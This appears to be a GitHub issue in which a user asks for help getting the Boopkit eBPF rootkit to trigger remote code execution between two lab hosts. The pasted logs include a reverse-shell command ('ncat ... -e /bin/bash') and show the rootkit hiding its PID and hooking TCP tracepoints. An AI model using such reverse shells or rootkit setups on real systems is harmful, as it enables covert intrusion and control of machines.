Skip to content

Little confused about server and client connections- Hope to get answer #21

Open
Open
Little confused about server and client connections- Hope to get answer#21
@antonbek89

Description

@antonbek89
antonbek89
opened on Aug 11, 2024

So I already compile Boopkit
In the server side ip 10.10.10.10 I run the binary boopkit

In the client ip 10.10.10.8 i run the boopscript after i change the RHOST and the LHOST

RHOST = 10.10.10.10
LHOST = 10.10.10.8

The ports 22,3535,3545 open (inbound) from both side

When I try run it from the client


  -> *[RCE]     : ncat 10.10.10.8 3545 -e /bin/bash &
  -> *[Local]   : 10.10.10.8:3535
  -> *[Remote]  : 10.10.10.10:22
================================================================
  -> [112 bytes]   TX SYN     : 10.10.10.10 (SOCK_RAW, RCE, *bad csum)
  -> [handshake]   CONN       : 10.10.10.10:22
  -> [060 bytes]   TX SYN     : 10.10.10.10:22
  <- [048 bytes]   RX SYN-ACK : 10.10.10.10:22 (RCE)
  -> [060 bytes]   TX ACK-RST : 10.10.10.10:22
  -> [hanging..]   CONN       : 10.10.10.8:3535 (listen...)

From server side

================================================================
  -> getuid()                : 0
  -> getpid()                : 1246
  -> getppid()               : 1064
  -> Logs                    : /sys/kernel/tracing/trace_pipe
  -> Loading eBPF Probe      : /root/.boopkit/pr0be.safe.o
  -> Starting xCap Interface : lo
  -> Initalizing Ring Buffer
  ->   eBPF Probe Loaded     : /root/.boopkit/pr0be.safe.o
  -> Loading eBPF Probe      : /root/.boopkit/pr0be.boop.o
  ->   eBPF Probe Loaded     : /root/.boopkit/pr0be.boop.o
  ->   eBPF Program Attached : tp/tcp/tcp_bad_csum
  ->   eBPF Program Attached : tp/tcp/tcp_receive_reset
  ->   eBPF   Map Name       : event
  -> Obfuscating PID         : 1246
  -> xCap RingBuffer Started : lo
================================================================
  ** Boop source: 10.10.10.8
  -> Search xCap Ring Buffer: 10.10.10.8
  -> Initalizing Ring Buffer
  -> Taking snapshot of network traffic.
  -> No RCE in xCap!
  -> Free Ring Buffer
  ** Boop source: 10.10.10.10
  -> Search xCap Ring Buffer: 10.10.10.10
  -> Initalizing Ring Buffer
  -> Taking snapshot of network traffic.
  -> No RCE in xCap!
  -> Free Ring Buffer
  ** Boop source: 10.10.10.10
  -> Search xCap Ring Buffer: 10.10.10.10
  -> Initalizing Ring Buffer
  -> Taking snapshot of network traffic.
  -> No RCE in xCap!
  -> Free Ring Buffer
  ** Boop source: 10.10.10.10
  -> Search xCap Ring Buffer: 10.10.10.10
  -> Initalizing Ring Buffer
  -> Taking snapshot of network traffic.
  -> No RCE in xCap!
  -> Free Ring Buffer

What I doing wrong?

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions